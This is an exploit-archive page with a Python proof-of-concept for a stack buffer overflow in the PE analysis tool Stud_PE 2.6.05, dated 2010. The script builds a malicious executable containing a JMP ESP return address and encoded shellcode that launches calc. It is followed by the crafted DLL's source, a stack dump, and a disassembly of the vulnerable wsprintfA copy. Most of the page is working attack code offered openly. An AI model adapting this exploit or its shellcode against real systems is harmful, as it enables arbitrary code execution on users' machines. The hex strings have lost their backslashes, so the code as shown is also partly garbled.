[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Stud_PE <= v2.6.05 Stack Overflow PoC exploit
# Published : 2010-03-28
# Author : zha0
# Previous Title : Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit
# Next Title : ASX to MP3 Converter Version 3.0.0.100 (.pls) Universal Stack Overflow Exploit
###################################################################
# Exploit Title: Stud_PE <= v2.6.05 Stack Overflow PoC exploit
# Date: 03/28/2010
# Author: zha0
# Software Link: http://www.cgsoftlabs.ro/studpe.html
# Version: Stud_PE <= v2.6.05
# Tested on: Windows XP SP3 CHT
# CVE :
# Code :
# Greetz to : nanika, Catherine & chr00t team
###################################################################
#!/usr/bin/python
pe_exe=(
"x4Dx5Ax90x00x03x00x00x00x04x00x00x00xFFxFFx00x00"
"xB8x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00xB0x00x00x00"
"x0Ex1FxBAx0Ex00xB4x09xCDx21xB8x01x4CxCDx21x54x68"
"x69x73x20x70x72x6Fx67x72x61x6Dx20x63x61x6Ex6Ex6F"
"x74x20x62x65x20x72x75x6Ex20x69x6Ex20x44x4Fx53x20"
"x6Dx6Fx64x65x2Ex0Dx0Dx0Ax24x00x00x00x00x00x00x00"
"xCFxA3x03xDBx8BxC2x6Dx88x8BxC2x6Dx88x8BxC2x6Dx88"
"xBDxE4x66x88x8AxC2x6Dx88x74xE2x69x88x8AxC2x6Dx88"
"x52x69x63x68x8BxC2x6Dx88x00x00x00x00x00x00x00x00"
"x50x45x00x00x4Cx01x01x00x75xCExAEx4Bx00x00x00x00"
"x00x00x00x00xE0x00x0Fx01x0Bx01x06x00x00x02x00x00"
"x00x00x00x00x00x00x00x00x01x10x00x00x00x10x00x00"
"x00x20x00x00x00x00x40x00x00x10x00x00x00x02x00x00"
"x04x00x00x00x00x00x00x00x04x00x00x00x00x00x00x00"
"x00x20x00x00x00x02x00x00x00x00x00x00x02x00x00x00"
"x00x00x10x00x00x10x00x00x00x00x10x00x00x10x00x00"
"x00x00x00x00x10x00x00x00x10x10x00x00x47x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x2Ex74x65x78x74x00x00x00"
"x57x00x00x00x00x10x00x00x00x02x00x00x00x02x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x20x00x00x60"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xC3xC3x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x75xCExAEx4Bx00x00x00x00x42x10x00x00"
"x01x00x00x00x01x00x00x00x01x00x00x00x38x10x00x00"
"x3Cx10x00x00x40x10x00x00x00x10x00x00x52x10x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75x6Ex6Bx6Ax75"
"x31x31x31x31x32x32x32x32x33x33x33x33xCEx24xFAx7F" # 0x7FFA24CE JMP ESP Windows XP CHT SP2,SP3
"x90xEBx0Fx5Ex8BxFEx33xC9xB1x7CxACx34x87xAAxE2xFA" # Shellcode : 146 bytes, WinExec("calc"); ExitProcess(0);
"xEBx05xE8xECxFFxFFxFFx6Fx8Fx87x87x87x1Fx79x0Dx89"
"xF9x5Fx65xF4xDFxD7xD7xEDx85xDExD8xE0xE3x26xB7x87"
"x0CxC7x8Bx0CxF7x9Bx2Ax0CxEFx8FxD6x0CxF2xBBx0CxF3"
"xA9xFFx84x72xD1x0CxF1xA7x84x72xB4x4ExCExC6x2Ax84"
"x42xB4x5Cx88x39x97xBFx75xF3x8Fx46x4Cx8Ax84x5DxC7"
"x6Cx76xBCx98xF2x60xD9x0CxD9xA3x84x5AxE1x0Cx8BxCC"
"x0CxD9x9Bx84x5Ax0Cx83x0Cx84x42x2CxDEx65x3BxDAxED"
"x87x6Fx82x87x87x87xE4xE6xEBxE4x87x78xD2x87xEDx87"
"x78xD2x83x00x00x00x00x00x00x00x00x00x00x00x00x00"
)
try:
rap = open("shu.exe",'wb')
rap.write(pe_exe)
rap.close()
print "Exploit file created!n"
except:
print "Error occured!"
# ---------------------------------------- ca.c Source ---------------------------------------------------------------
# // cl ca.c
# #include <windows.h>
#
# #pragma comment(linker, "/ENTRY:WinMain")
# #pragma comment(linker, "/ALIGN:4096 /FILEALIGN:512")
# #pragma comment(linker, "/merge:.rdata=.text")
# #pragma optimize("gsy", on)
#
# extern "C" __declspec (dllexport) void junkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkjunkju111122223333444455555(void){}
#
# int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { return 0; }
#
# ---------------------------------------- Stack ---------------------------------------------------------------------
# 0012F5BC
# ....
# .... 100h = 256 bytes
# .... (contains string " rva: %08X ord: %1d" ..)
# ....
# 0012F6BC 0012F6EC Pointer to next SEH record
# 0012F6C0 00484171 SE handler
# 0012F6C4 FFFFFFFF
# 0012F6C8 00407C45 RETURN to Stud_PE.00407C45 from Stud_PE.0042F070
#
# ---------------------------------------- Stud_PE Code --------------------------------------------------------------
# sub_42F070
# .....
# 0042F4E9 |> B9 40000000 |MOV ECX,40 ; 40*sizeof(DWORD)
# 0042F4EE |. 33C0 |XOR EAX,EAX
# 0042F4F0 |. 8DBC24 58020000 |LEA EDI,DWORD PTR SS:[ESP+258]
# 0042F4F7 |. F3:AB |REP STOS DWORD PTR ES:[EDI]
#
# 0042F4F9 |. 8B4424 1C |MOV EAX,DWORD PTR SS:[ESP+1C]
# 0042F4FD |. 8B0CB0 |MOV ECX,DWORD PTR DS:[EAX+ESI*4]
# 0042F500 |. 51 |PUSH ECX
# 0042F501 |. 8D8C24 30010000 |LEA ECX,DWORD PTR SS:[ESP+130]
# 0042F508 |. E8 A3AFFFFF |CALL Stud_PE.0042A4B0
#
# // Copy the export name to stack
# 0042F50D |. 50 |PUSH EAX ; /<%s>
# 0042F50E |. 8D9424 5C020000 |LEA EDX,DWORD PTR SS:[ESP+25C] ; |
# 0042F515 |. 68 40B44A00 |PUSH Stud_PE.004AB440 ; |Format = " %s "
# 0042F51A |. 52 |PUSH EDX ; |s
# 0042F51B |. FF15 74864800 |CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; wsprintfA
# 0042F521 |. 83C4 0C |ADD ESP,0C
# 0042F524 |> 3B75 18 |CMP ESI,[ARG.5]
# 0042F527 |. 75 1B |JNZ SHORT Stud_PE.0042F544
#
# 0042F529 |. 68 38B44A00 |PUSH Stud_PE.004AB438 ; /<%s> = "No name"
# 0042F52E |. 8D8424 5C020000 |LEA EAX,DWORD PTR SS:[ESP+25C] ; |
# 0042F535 |. 68 40B44A00 |PUSH Stud_PE.004AB440 ; |Format = " %s "
# 0042F53A |. 50 |PUSH EAX ; |s
# 0042F53B |. FF15 74864800 |CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; wsprintfA
# 0042F541 |. 83C4 0C |ADD ESP,0C
#
# 0042F544 |> 8D7C24 2C |LEA EDI,DWORD PTR SS:[ESP+2C]
# 0042F548 |. 83C9 FF |OR ECX,FFFFFFFF
# 0042F54B |. 33C0 |XOR EAX,EAX
# 0042F54D |. 8D9424 58020000 |LEA EDX,DWORD PTR SS:[ESP+258]
# 0042F554 |. F2:AE |REPNE SCAS BYTE PTR ES:[EDI]
# 0042F556 |. F7D1 |NOT ECX
# 0042F558 |. 2BF9 |SUB EDI,ECX
# 0042F55A |. 50 |PUSH EAX ; /Arg9 => 00000000
# 0042F55B |. 8BF7 |MOV ESI,EDI ; |
# 0042F55D |. 8BFA |MOV EDI,EDX ; |
# 0042F55F |. 8BD1 |MOV EDX,ECX ; |
# 0042F561 |. 83C9 FF |OR ECX,FFFFFFFF ; |
# 0042F564 |. F2:AE |REPNE SCAS BYTE PTR ES:[EDI] ; |
# 0042F566 |. 8BCA |MOV ECX,EDX ; |
# 0042F568 |. 4F |DEC EDI ; |
# 0042F569 |. C1E9 02 |SHR ECX,2 ; |
# 0042F56C |. F3:A5 |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] ; |
# ...........
#